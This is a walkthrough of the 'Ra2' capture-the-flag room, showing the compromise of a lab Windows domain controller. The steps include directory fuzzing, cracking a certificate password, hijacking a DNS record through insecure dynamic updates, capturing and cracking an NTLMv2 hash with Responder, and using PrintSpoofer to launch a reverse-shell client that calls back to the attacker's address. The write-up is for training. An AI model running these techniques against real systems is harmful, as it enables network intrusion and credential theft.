Contents

Ra2

Just when they thought their hashes were safe…

Difficulty: Hard

Room: Ra2

Created by: 4ndr34zz and theart42

__init__

Story

WindCorp recently had a security-breach. Since then they have hardened their infrastructure, learning from their mistakes. But maybe not enough? You have managed to enter their local network…

Happy Hacking!

Created by @4nqr34z and @theart42

(Give it at least 5 minutes to boot)


So from the description we see the Windcorp Corporation is back for more. I really enjoyed the Ra room and Set so when I saw this sequel come out I was pumped. I’m a sucker for hacking on Windows and I knew this room would be fun.

This challenege reminded me how easy it can be to pass up things like DNS. You’ll notice that without enumerating DNS you won’t get very far. This challenge had a few pieces that had to all had to come together before being able to make any movement.


enumeration

Off the bat we’ll use Threader3000 to see what ports are open.

Shout out to the mayor. I appreciate all the work he puts in with educational content and assisting people in the community.
PyPI project: Threader3000
Github repo: Threader3000
Twitch: https://www.twitch.tv/themayor11

threader3000

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
🚀 threader3000
--------------------------------------------------
Python Port Scanner 3000
A project by The Mayor/Dievus
--------------------------------------------------
Enter your target IP address or URL here: 10.10.165.58
--------------------------------------------------
Scanning target 10.10.165.58
Time started:
--------------------------------------------------
Port 53 is open
Port 139 is open
Port 135 is open
Port 88 is open
Port 80 is open
Port 389 is open
Port 464 is open
Port 445 is open
Port 443 is open
Port 593 is open
Port 636 is open
Port 2179 is open
Port 3268 is open
Port 3269 is open
Port 3389 is open
Port 5223 is open
Port 5270 is open
Port 5229 is open
Port 5222 is open
Port 5263 is open
Port 5262 is open
Port 5269 is open
Port 5276 is open
Port 5275 is open
Port 7070 is open
Port 7443 is open
Port 7777 is open
Port 9091 is open
Port 9090 is open
Port 9389 is open
Port 49670 is open
Port 49669 is open
Port 49668 is open
Port 49666 is open
Port 49673 is open
Port 49702 is open
Port 49694 is open
Port scan completed in 0:03:00.720537

nmap

1
2
3
🚀 mkdir nmap && IP=10.10.x.x

🚀 nmap -p- -T4 -sC -sV -Pn -vvv -oA nmap/scan $IP

The nmap results were pretty lengthy. Judging by the ports that are open like LDAP/S, DNS, etc I think it’s safe to assume this is a domain controller. If you’ve done Ra you’ll also notice the fire hostname looks familiar. We also find a few more hostnames:

  • fire.windcorp.thm
  • selfservice.windcorp.thm
  • selfservice.dev.windcorp.thm

Let’s add these to our /etc/hosts.


It’s always DNS

There’s an old saying that often holds up… It’s always DNS. DNS misconfigurations and even DNS zone transfers are still common in the real world. I won’t be diving into DNS in this writeup but I’ll give you a friendly reminder… it’s always DNS.

🚀 dig windcorp.thm any @$IP

/images/ra2/dig.png

We get our first flag and a really good hint for what we’ll need to do. Allowing unsecured dynamic DNS updates gives any computer regardless of being joined to the domain or not, the ability to modify or create DNS records. Let’s do some more enumeration and see what we could do with being able to update DNS records.

DNS Dynamic Updating Microsoft Article
nsupdate - “…used to submit Dynamic DNS Update requests as defined in RFC2136 to a name server."
If you were curious what the configuration looks like in the DNS MMC snap-in:
/images/ra2/secure-dns.png


dirsearch

/images/ra2/fire-homepage.png
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
🚀 dirsearch.py -u https://fire.windcorp.thm -E -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -l -t 100 -x 400

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 100 | Wordlist size: 209422 | Request count: 209422

Error Log: /opt/dirsearch/logs/errors-20-08-15_10-25-18.log

Target: https://fire.windcorp.thm

Output File: /opt/dirsearch/reports/fire.windcorp.thm/20-08-15_10-25-19

[10:25:19] Starting:
[10:25:25] 200 -   12KB - /
[10:25:25] 301 -  153B  - /img  ->  https://fire.windcorp.thm/img/
[10:25:26] 301 -  153B  - /css  ->  https://fire.windcorp.thm/css/
[10:25:28] 301 -  156B  - /vendor  ->  https://fire.windcorp.thm/vendor/
[10:28:50] 302 -  165B  - /powershell  ->  /powershell/default.aspx?ReturnUrl=%2fpowershell

/powershell

/powershell? Navigating to the page we can see this is Microsoft’s powershell web access web app. I was unable to find any known vulnerabilities with this webapp so I moved on. We’ll come back to this when we get some credentials.

/images/ra2/powershell-web1.png

selfservice

We see a few more hints on the homepage in the message from the management team. They are now using certificates everywhere and a new self service portal is being developed. We see a selfservice button on the homepage.

Testing the happy path for self service doesn’t yield anything note worthy. Intercepting the requests in burp we see the NTLMSSP challenge response. Decoding the base64 doesn’t leak anything we don’t already know like a new hostname.

/images/ra2/burp1.png

Time to check out the dev site.


selfservice-dev

Navigating to the webpage we’re greeted with an under construction landing page. Nothing special in the source and I wasn’t expecting something ‘ctfy’ like that for this room.

/images/ra2/dev-home.png

dirsearch pt2

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
🚀 dirsearch.py -u https://selfservice.dev.windcorp.thm -E -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -l -t 100 -x 400

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 100 | Wordlist size: 209422 | Request count: 209422

Error Log: /opt/dirsearch/logs/errors-20-08-15_11-24-57.log

Target: https://selfservice.dev.windcorp.thm

Output File: /opt/dirsearch/reports/selfservice.dev.windcorp.thm/20-08-15_11-24-57

[11:24:57] Starting:
[11:25:03] 200 -  106B  - /
[11:25:06] 301 -  167B  - /backup  ->  https://selfservice.dev.windcorp.thm/backup/

Shortly after starting the fuzzing we see there’s a /backup directory. Navigating to the directory there’s a couple files cert.pfx and web.config. Let’s download them locally. Nothing to see with web.config.

/images/ra2/backup.png

pfx2john

Windows servers use .pfx files that contain a public key file and the associated private key file. Let’s use pfx2john.

🚀 pfx2john.py cert.pfx > hash

Crack it with john

🚀 john hash --wordlist=/opt/rockyou.txt

Now we can create a public and private key with openssl using cert.pfx and the password we cracked with john.

Private key: 🚀 openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes

/images/ra2/private-key.png

Public key: 🚀 openssl pkcs12 -in cert.pfx -out crt.pem -clcerts -nokeys

/images/ra2/public-key.png

nsupdate

Since we know we can update DNS records without our machine being joined to the domain we’ll use nsupdate. Let’s send a request to delete the existing A record for selfservice.windcorp.thm and then send an update add request for a new A record to have selfservice resolve to our THM IP.

nsupdate man page

1
2
3
4
5
6
7
🚀 nsupdate
> server 10.10.114.83
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm 1234 A 10.x.x.x
> send
> quit

dig

Let’s query the DNS server to see if selfservice.windcorp.thm will now resolve to our THM IP when a client requests a lookup. 🚀 dig selfservice.windcorp.thm @10.10.114.83

/images/ra2/a.png

Responder

Before you start responder you’ll want to copy the two certs generated earlier to /usr/share/responder/certs or wherever /certs lives on your machine.

/images/ra2/cp.png

We’ll want to edit responder’s config for the HTTPS server.

/images/ra2/responder-config.png

Fire up responder to listen on tun0

🚀 responder -I tun0

/images/ra2/responder.png

We capture a request.


crack the hash

Save the hash and crack it with your tool of choice. I used john.

/images/ra2/ntlmv2.png

PS web access

We can login with the user’s credentials

/images/ra2/powershell-web2.png

We find flag 2. From here I opted to get a real shell but you could finish the privesc from the web shell.

/images/ra2/flag2.png

xc by xct

https://github.com/xct/xc

I’ve been meaning to try xct’s ’netcat like reverse shell for linux and windows’ xc. I’ve heard good things about it and after using it I’ve been really enjoying it.

That said you could also just do everything through the webshell, use netcat, etc. Do you! 😁️

updog

https://github.com/sc0tfree/updog

pip3 install updog

I’m going to use updog as my web sever to transfer files. I think it’s a nice replacement to a standard python simple http server that has features like ssl transport, passwords, web ui, and the ability upload data to the server. I hacked together something similar a few months ago but it’s nowhere near as polished as this.. and look at the logo!

privesc

options

it4m - PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019

Here’s a couple of options to privesc. I chose to compile PrintSpoofer from it4m.

  • Use PrintSpoofer
  • Use SweetPotato which is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. This will require you compile an executable
  • Use a compiled PrintSpoofer.exe from the mayors github.

One of the first things I like to do when I get a shell is run whoami /all. We notice we have the SeImpersonatePrivilege and start thinking about the rogue potato exploit and printspoofer.

/images/ra2/whoami.png

From here we can upload one of the exploits below. Start an xc or netcat listener then run one of the exploits.


printspoofer.exe

Here’s an example of using PrintSpoofer.exe and an argumentless xc client. Not having to use arguments is such a cool idea.

1
2
3
PS C:\Users\user.WINDCORP\Documents> 

.\PrintSpoofer.exe -c xc_10.x.x.x_9001.exe
/images/ra2/xc2.png

sweet potato

Somebody who finished the room mentioned they had used https://github.com/CCob/SweetPotato. I tested it and it worked for me as well.

/images/ra2/sweet.png

flag 3

/images/ra2/flag3.png

/etc/takeaways

I wasn’t planning on making a writeup for this room as I’ve been busy cramming for the OSCP exam but I thought I’d put something together. Thanks 4ndr34zz and theart42 for another great room!